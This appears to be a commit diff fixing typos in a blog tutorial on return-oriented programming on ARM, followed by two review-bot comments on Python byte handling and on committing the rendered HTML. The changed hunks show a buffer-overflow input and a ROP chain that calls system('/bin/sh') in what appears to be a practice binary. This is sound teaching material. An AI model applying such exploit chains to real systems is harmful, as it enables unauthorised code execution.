Typos and rewording
Anirudh icyph0x@pm.me
Sat, 08 Jun 2019 17:49:44 +0530
2 files changed, 8 insertions(+), 8 deletions(-)
M build/blog/rop-on-arm/index.html → build/blog/rop-on-arm/index.html
@@ -164,7 +164,7 @@ control program execution flow. Let’s try jumping to the <code>winner</code> function.</p>
<p>Disassemble <code>winner</code> again using <code>disas winner</code> and note down the offset of the second instruction — <code>add r11, sp, #4</code>. -For this, we’ll use Python to print out input string replacing <code>FFFF</code> with +For this, we’ll use Python to print our input string replacing <code>FFFF</code> with the address of <code>winner</code>. Note the endianness.</p> <div class="codehilite"><pre><span></span><code>$ python -c <span class="s1">'print("AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00")'</span> <span class="p">|</span> ./rop2@@ -226,18 +226,18 @@ <span class="n">string</span> <span class="o">=</span> <span class="s2">"AAAABBBBCCCCDDDDEEEE"</span>
<span class="n">gadget</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">"I"</span><span class="p">,</span> <span class="mh">0x00010550</span><span class="p">)</span> <span class="n">system</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">"I"</span><span class="p">,</span> <span class="mh">0x00010538</span><span class="p">)</span> -<span class="k">print</span><span class="p">(</span><span class="n">string</span> <span class="o">+</span> <span class="n">gadget</span> <span class="o">+</span> <span class="n">binsh</span> <span class="o">+</span> <span class="n">system_pc</span><span class="p">)</span> +<span class="k">print</span><span class="p">(</span><span class="n">string</span> <span class="o">+</span> <span class="n">gadget</span> <span class="o">+</span> <span class="n">binsh</span> <span class="o">+</span> <span class="n">system</span><span class="p">)</span> </code></pre></div> <p>Honestly, not too far off from our pseudo-code :)</p> -<p>Let's see it in action:</p> +<p>Let’s see it in action:</p> <p><img src="/static/img/the_shell.png" alt="the shell!" /></p> <p>Notice that it doesn’t work the first time, and this is because <code>/bin/sh</code> terminates when the pipe closes, since there’s no input coming in from STDIN. -To get around this, we use <code>cat(1)</code> which allows us to relay input via <code>cat</code> +To get around this, we use <code>cat(1)</code> which allows us to relay input through it to the shell. Nifty trick.</p> <h3>Conclusion</h3>
M pages/blog/rop-on-arm.md → pages/blog/rop-on-arm.md
@@ -134,7 +134,7 @@ control program execution flow. Let’s try jumping to the `winner` function.
Disassemble `winner` again using `disas winner` and note down the offset of the second instruction — `add r11, sp, #4`. -For this, we’ll use Python to print out input string replacing `FFFF` with +For this, we’ll use Python to print our input string replacing `FFFF` with the address of `winner`. Note the endianness. ```shell@@ -196,18 +196,18 @@ string = "AAAABBBBCCCCDDDDEEEE"
gadget = struct.pack("I", 0x00010550) system = struct.pack("I", 0x00010538) -print(string + gadget + binsh + system_pc) +print(string + gadget + binsh + system) ``` Honestly, not too far off from our pseudo-code :) -Let's see it in action: +Let’s see it in action: ![the shell!](/static/img/the_shell.png) Notice that it doesn’t work the first time, and this is because `/bin/sh` terminates when the pipe closes, since there’s no input coming in from STDIN. -To get around this, we use `cat(1)` which allows us to relay input via `cat` +To get around this, we use `cat(1)` which allows us to relay input through it to the shell. Nifty trick. ### Conclusion
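Review bot: In the `@@ -196` hunk of `pages/blog/rop-on-arm.md`, the corrected line `print(string + gadget + binsh + system)` concatenates the `str` in `string` with the `bytes` returned by `struct.pack`, which only works under Python 2 (Python 3 raises `TypeError`); the post should state the interpreter it targets, or build the payload with a bytes literal such as `string = b"AAAABBBBCCCCDDDDEEEE"`. Also, `struct.pack("I", ...)` uses the host's native byte order, so since the surrounding text says "Note the endianness", pinning it with `struct.pack("<I", 0x00010550)` and `struct.pack("<I", 0x00010538)` would make the little-endian layout explicit regardless of where the script is run.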
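Review bot: The `build/blog/rop-on-arm/index.html` hunks duplicate every wording change from the markdown source as rendered codehilite markup, so each prose fix in this commit lands twice and the generated `<span>` structure will churn whenever the highlighter version changes; consider leaving the rendered output out of version control and regenerating it from `pages/blog/rop-on-arm.md` at build time.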